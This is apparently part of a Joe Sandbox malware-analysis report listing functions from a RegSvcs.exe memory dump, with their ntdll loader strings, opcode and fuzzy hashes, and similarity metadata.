Function 01A120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01A120F3
minkernel\ntdll\ldrinit.c, xrefs: 01A12104
LdrpInitializationFailure, xrefs: 01A120FA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: f1cdefe44969a72e628020785d78926da9d19dafa92c279cc5abc270723b7081
Instruction ID: 69aa98d7a0d787599d903d41742b9b790344ae2796fe80ff8f5c4f79e2685451
Opcode Fuzzy Hash: f1cdefe44969a72e628020785d78926da9d19dafa92c279cc5abc270723b7081
Instruction Fuzzy Hash: C1F02238640308ABEB20E71CDD42F997B68FF80B04F200469FA046B285D2B0E941C691

Uniqueness

Uniqueness Score: -1.00%

Function 019A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F4D8A

Strings

#%u, xrefs: 019F4D82

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: b3d1b07ea964515cfb3f293a505d8fb43cfd0ed08b49ec2ddab507b02e1d0a91
Instruction ID: e1caa533d0f363c5d89138d34f51f58dbe38c1dc3048bfc3d8b2ffec2f3a8414
Opcode Fuzzy Hash: b3d1b07ea964515cfb3f293a505d8fb43cfd0ed08b49ec2ddab507b02e1d0a91
Instruction Fuzzy Hash: 48714D71A0014A9FDB01DFA8C994FAEB7F8FF48704F154069E909E7251E634EE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0199A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0199AA13
LdrResSearchResource Exit, xrefs: 0199AA25

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 5aa3c0de7cbdeb0fddc6f3ac308a1060def81afa52a49a691a79867d973920af
Instruction ID: 800f033cd1cf084f9d514e49501f230ab3a0a45bbb3e1f09ac36ca222cb7a9b2
Opcode Fuzzy Hash: 5aa3c0de7cbdeb0fddc6f3ac308a1060def81afa52a49a691a79867d973920af
Instruction Fuzzy Hash: 51E16271E01219ABEF21CF9DC940BAEBBBAFF54314F14452AEA09E7251D778D940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A5A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A5A44B
`, xrefs: 01A5A551

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 9c3bd8b35d8aba30b21ee5bda4b968fff7de3211172712fc3425a172c0d6e2bb
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 56C1C1313083429BE765CF28C840B6BBBE5AFD4318F084A2DFA96CB291D774D505CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A0E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 01A0E751
Legacy, xrefs: 01A0E75A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 0aa452d57f832fa859581f6203ceb308a4dc907b2225f819d275b6797941c899
Instruction ID: 5912de9a1d7211956eabc2063a367bc2c6d0d2e70e4c4b0c67f8160a3a94ca11
Opcode Fuzzy Hash: 0aa452d57f832fa859581f6203ceb308a4dc907b2225f819d275b6797941c899
Instruction Fuzzy Hash: 83615D71E042099FDB16DFA9D840BADBBF9FB44700F14486DE649EB291D731AA04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01A34437
MUI, xrefs: 01A34525

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: c1a98911f544f67cc1a75e3f1a5fcc63dfc120a1b90da16c335f50a0f5c727f4
Instruction ID: e20f16e76cd4b58041a4c6c59e06387c8ada502661b142801827d2234ddf6643
Opcode Fuzzy Hash: c1a98911f544f67cc1a75e3f1a5fcc63dfc120a1b90da16c335f50a0f5c727f4
Instruction Fuzzy Hash: FC510871E0021DAFEF11DFA9CC80BEEBBB9EB88754F104529E615A7290D6349E05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01990540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0199063D

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: cf3fa631fe8e5dd7fa856caa36e26eed7898a03f3e87b3a0b28a6f03ca36c1a0
Instruction ID: 28d195c9d189e9aa819315a85c1118ab5231f87378db5873167fc15a6f24705d
Opcode Fuzzy Hash: cf3fa631fe8e5dd7fa856caa36e26eed7898a03f3e87b3a0b28a6f03ca36c1a0
Instruction Fuzzy Hash: B851BC715047428BDB24EF6DC5406A7BBEDAFC4305F18893EEAAE87241E730E545CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0199A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0199A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0199A2FB

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 0fa29cc1974f88b2cb7e89d1fdd3519a464ce1c335e523136b5a815af00ffe2b
Instruction ID: 382a001d15397acb027708fdb7880e2f9b0a7db186286d4981c8f6c0a793dcd8
Opcode Fuzzy Hash: 0fa29cc1974f88b2cb7e89d1fdd3519a464ce1c335e523136b5a815af00ffe2b
Instruction Fuzzy Hash: 5941AF30A04659DFEB15CF5DC441B69BBB8FF85705F144469EE08DB251E2B5D940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 019CA5E9
Cleanup Group, xrefs: 019CA5E4

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: f41941661fb6e2fb8b66d3db141aaefdac2e57c45e0a1b8ce68e72c3165a575a
Instruction ID: ee85a7e975d33925b55f4dca04e4b4a753ad942407ccec350be16fb82512f9de
Opcode Fuzzy Hash: f41941661fb6e2fb8b66d3db141aaefdac2e57c45e0a1b8ce68e72c3165a575a
Instruction Fuzzy Hash: 2E01ADB2250748AFE311DF14CE45B1677E8E784B19F01893DA68CC7190E334D804CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0199C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0199C8C3, 0199CA40

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f4770344bc05445fc9670f9fa75d80c68e5534736d3b3be24a214761792f9ede
Instruction ID: 324e5d27962a049905b0e05ef7ee7f1d167d8946d9182f2bad82200b83102b7e
Opcode Fuzzy Hash: f4770344bc05445fc9670f9fa75d80c68e5534736d3b3be24a214761792f9ede
Instruction Fuzzy Hash: 5A824A75E002199BEF25CFADC880BEDBBB9BF48711F148169D91DAB291D730AD81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A16420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01A165C1

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 88d7619d6a841e349542f6875e4f07cc95aed92b572c7e89fa91b7abc924b416
Instruction ID: 8c1507923af3e64bac1ec688e803846e1cae0f90528d8e5f9651e5594d2f63e3
Opcode Fuzzy Hash: 88d7619d6a841e349542f6875e4f07cc95aed92b572c7e89fa91b7abc924b416
Instruction Fuzzy Hash: B6917271A01219AFEB21DBA9CD85FEEBBB8EF58750F104055F604EB194D774AD04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A3E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01A3E1FA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0b77a49fb43a4ac2c7c6526f9934cde6f5e71e3da03c9cc7a39a5d21f8167c52
Instruction ID: 655c5ff48d99d446464d56dd0cf9680eeb3f2c57ab44ca2633a529a228cbdece
Opcode Fuzzy Hash: 0b77a49fb43a4ac2c7c6526f9934cde6f5e71e3da03c9cc7a39a5d21f8167c52
Instruction Fuzzy Hash: 4D91AC32A01649BEDB22ABA5DC84FEFBBB9EFC5740F140029F505A7250EB349905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01A067C9

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8b8822d39ab27dc7ca1e4c991d7282c1388e3ebeb10be06340b25451f4487af7
Instruction ID: 5f16104139ea7dae7263ffbee2937d96b4cc97a766023013a05cbda2addade0b
Opcode Fuzzy Hash: 8b8822d39ab27dc7ca1e4c991d7282c1388e3ebeb10be06340b25451f4487af7
Instruction Fuzzy Hash: A671A4B5E0021ADFDF2ACF9DE5906EDBBB1BF88714F14812EE509A7280E7319915CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A34978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01A34A7F

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: a096a8439078fd238aaed6864715899bca3cfcac56b45c315ac585bcd29b9da2
Instruction ID: ffe7a92fce95bd838a73a7010ca29313fc3b0b416db0f7cf7ae07868a8f1332e
Opcode Fuzzy Hash: a096a8439078fd238aaed6864715899bca3cfcac56b45c315ac585bcd29b9da2
Instruction Fuzzy Hash: D851A472D0022A9BDF14DF99D840BAEBBB4BF88B50F054169FA15BB250D7749D02CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 019AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 019AE6A4

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 032cd34223f6a956e954d60c85c0976a2d9a3f0e9022cfb25586ddd61c1d916f
Instruction ID: 641e6faf3131a7890f64f3bca06c02f246667f93d814fd9a6ed824dea7484110
Opcode Fuzzy Hash: 032cd34223f6a956e954d60c85c0976a2d9a3f0e9022cfb25586ddd61c1d916f
Instruction Fuzzy Hash: 1B416072508312ABD711DA65C980F6BBBECAFC8618F84092DB68CD7140E674D908C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 01A0C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01A0C77F

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: ba6a8739d801d909f5dc399fe433d0293decebb788d0755f24e17edb674d703a
Instruction ID: d8524719bb0b92abda510bf2244de4ef9a8d6253da099471f2497a362dbed49a
Opcode Fuzzy Hash: ba6a8739d801d909f5dc399fe433d0293decebb788d0755f24e17edb674d703a
Instruction Fuzzy Hash: A04147B1D0052DABDB22DB50DC84FDEB77CAB55724F0045E5A608AB184DB709E898F98

Uniqueness

Uniqueness Score: -1.00%

Function 01A26B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01A26B91

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: b0ce1927bf789aabe695c1ad6fc7a54f17e627ba7fc81fc44130cbcf85865af2
Instruction ID: 923bbdbb1cde757a7a1863cc8add1b2491327972fb015cd2be64ba484607c29c
Opcode Fuzzy Hash: b0ce1927bf789aabe695c1ad6fc7a54f17e627ba7fc81fc44130cbcf85865af2
Instruction Fuzzy Hash: 3D31F631E017699AEB22EF6DC854BFE7BB8DF44704F544028ED49AB282D775D805CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A1892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A1895E

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 56b58c4cfe18b069281758aeb941443c383fd14279fa1f3afd6b16091c26c81a
Instruction ID: 2fefa200ef137a4f6a2f8ef4b62f300536f5ba26b120cbe638b57559cb342279
Opcode Fuzzy Hash: 56b58c4cfe18b069281758aeb941443c383fd14279fa1f3afd6b16091c26c81a
Instruction Fuzzy Hash: 5C01F732600211ABE7206B5AC884A6ABF66FFC1664F08001CF64687159CF346881C792

Uniqueness

Uniqueness Score: -1.00%

Function 01A32000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11c3b0dbef99ee766a2c275536645c4e97598c28f6e9370f1a4b8651ea1b7a1
Instruction ID: fd33949c8a8e014a08f4af02bff84ad2a3a3d7d7cda4cbd493b658f837dc5367
Opcode Fuzzy Hash: b11c3b0dbef99ee766a2c275536645c4e97598c28f6e9370f1a4b8651ea1b7a1
Instruction Fuzzy Hash: 9F42C1366083419FE726CF68C890B6BBBE5BFC8700F48492EFA8697250D771D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01A28158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ddeb5ef6121307f272680c97f45c301339e45df2501cb46ce2f815483da3fa
Instruction ID: d405cc9d82cd24c6b096ed9233b2bab01d084a9935ed227768a5d68d5c12c66c
Opcode Fuzzy Hash: 65ddeb5ef6121307f272680c97f45c301339e45df2501cb46ce2f815483da3fa
Instruction Fuzzy Hash: 6A425275E002299FEB25CF69C841BADBBF5BF88300F148199E94DEB241D7389985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 019A2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7bcc00078666dd22d1ba11e88cd3bc5a02e08448002676df54fc9484470c33
Instruction ID: 2e6562e354c5e06a32f6d2459d1698468ae8cb99acfd84b5899782cc4b873066
Opcode Fuzzy Hash: 2b7bcc00078666dd22d1ba11e88cd3bc5a02e08448002676df54fc9484470c33
Instruction Fuzzy Hash: 8D322F70A00315AFEB25CF69C944BBEBBF6BF84700F24451DD68E9B281D735A806CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A3A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b74a73192c43031e1bd5ca85490ab5709aa06fe6fa8c34b3953b34ecfd25b6
Instruction ID: 091da2226f2d29d60c1a13a2207c83de3f32a4369ce24187e25e19b1b15e57d3
Opcode Fuzzy Hash: 84b74a73192c43031e1bd5ca85490ab5709aa06fe6fa8c34b3953b34ecfd25b6
Instruction Fuzzy Hash: 6E22AA742046718BEB25CF2DC094772BBF1AF85340F08849AF9D6CB296E775E492DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01996A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c551540cfb7b1242243d77e11bad625f97d355ef9d603e82cc33512154f0871
Instruction ID: ad9d10937acced06b07d916ea5751d431a71725c14250bc3a61b0da76760d943
Opcode Fuzzy Hash: 5c551540cfb7b1242243d77e11bad625f97d355ef9d603e82cc33512154f0871
Instruction Fuzzy Hash: 36328B75A05205DFDF25CFACC480AAABBF5FF88310F148569EA59AB391D734E841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019B4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 4680b41408fe0754f08f63a807cffa87622a458c36a6496e1b93d2a66e7d54f8
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 9EF18271E0021A9BDF15CF99C690BEEBBF9BF84711F048129EA0AAB341D774E841DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A2892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 152c155dcdd32866e7d10e8300fc6ba720a039a5d25c0ee7cc6cb29caa80d817
Instruction ID: f030b6680b53eb9cbf31ed87ec90164207b2182c252c995856f311c660afa7d9
Opcode Fuzzy Hash: 152c155dcdd32866e7d10e8300fc6ba720a039a5d25c0ee7cc6cb29caa80d817
Instruction Fuzzy Hash: 02D1F071E0062A9BDF15CF6CC841ABEB7F1AF88304F198169E955E7241EB3DE9058B60

Uniqueness

Uniqueness Score: -1.00%

Function 019965D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8977aee71551fcbfd3189f95320ac58c3237fabb1a040466ae2cf423d906c15
Instruction ID: f3b6ffb7be92cc1b407db76599858b953c5fd1420c53f4dcebf274f7d9692f34
Opcode Fuzzy Hash: c8977aee71551fcbfd3189f95320ac58c3237fabb1a040466ae2cf423d906c15
Instruction Fuzzy Hash: BAE19E71608342DFCB15CF2CC490A6ABBE4FF89315F05896DE9998B351EB31E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01988397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc758b357b27fd5455191b55e0e0841e1bc9576812b76269c0d65add9d3db874
Instruction ID: 5e7c676ba68bb901a93a02d43ac372e1f26933154b61db0870334fd6e6783324
Opcode Fuzzy Hash: cc758b357b27fd5455191b55e0e0841e1bc9576812b76269c0d65add9d3db874
Instruction Fuzzy Hash: 29D1F571A1020A9BDB15EF69C880FBA77F5BF94714F44462DE91EDB280EB34E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01A18243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 876c0bed267240e3aea30beb6ae03b2a87419d2456aa7c04c71a56988232b3da
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: BBB1A175A00705AFEF25DF99C940EABBBB9FF84304F14442DAA5297798DB38E905CB10

Uniqueness

Uniqueness Score: -1.00%

Function 019A0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 826cc363f7cc3b586afe630c10775830b352501144127c8e224aedfe3bd7b400
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 56B10731600646AFDB21DBA9C850BBEBBFAAF84300F590559E65E97281DB30E945CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 019983C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1732d3f4dd05a20487eaf13aafabf6c1101b991883014a41b4007530d332a819
Instruction ID: 9333d5d84160030fcf73396c2d032ea7c8cd5e09f7e565cc94b200ef6915ec5a
Opcode Fuzzy Hash: 1732d3f4dd05a20487eaf13aafabf6c1101b991883014a41b4007530d332a819
Instruction Fuzzy Hash: A4C16870608345CFDB64CF18C484BAAB7E8BF88704F44496DEA8987291D774E948CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0198C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9187a475d6f71bbc004ad66f100b6502908b6fa338a9c2cb575c8ae51b2a2d
Instruction ID: 8daffb2118030880fc2145ae95a70c4d330d0960ba54560d261dd3339f363d8e
Opcode Fuzzy Hash: 3b9187a475d6f71bbc004ad66f100b6502908b6fa338a9c2cb575c8ae51b2a2d
Instruction Fuzzy Hash: BDB16070A042668BDB65DF68C880BA9B7F5EF84700F0485EAD50EE7291EB30DD85CB31

Uniqueness

Uniqueness Score: -1.00%

Function 019BE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edaf9bb9170cfcc0480f1cc537b5ae9d762b83ce2084bf430d305ff49a8bc76
Instruction ID: 414846d4afb8790f2f569cb21c83fcd93b53d6954e48f382c6e3920c5089c76b
Opcode Fuzzy Hash: 3edaf9bb9170cfcc0480f1cc537b5ae9d762b83ce2084bf430d305ff49a8bc76
Instruction Fuzzy Hash: B0A12832E00619EFEB22DB98C984FEDBBB8BB01714F050119EB19AB291D7749D45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 019D0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa81fd9c076d57c243d53036816d8a456ca0ad297c28f3ccffb996da8fe0836
Instruction ID: 02eb92e753d9ed147a8e0b5622a859be3f130e2c6bfbc22beb38d8ca8d70d894
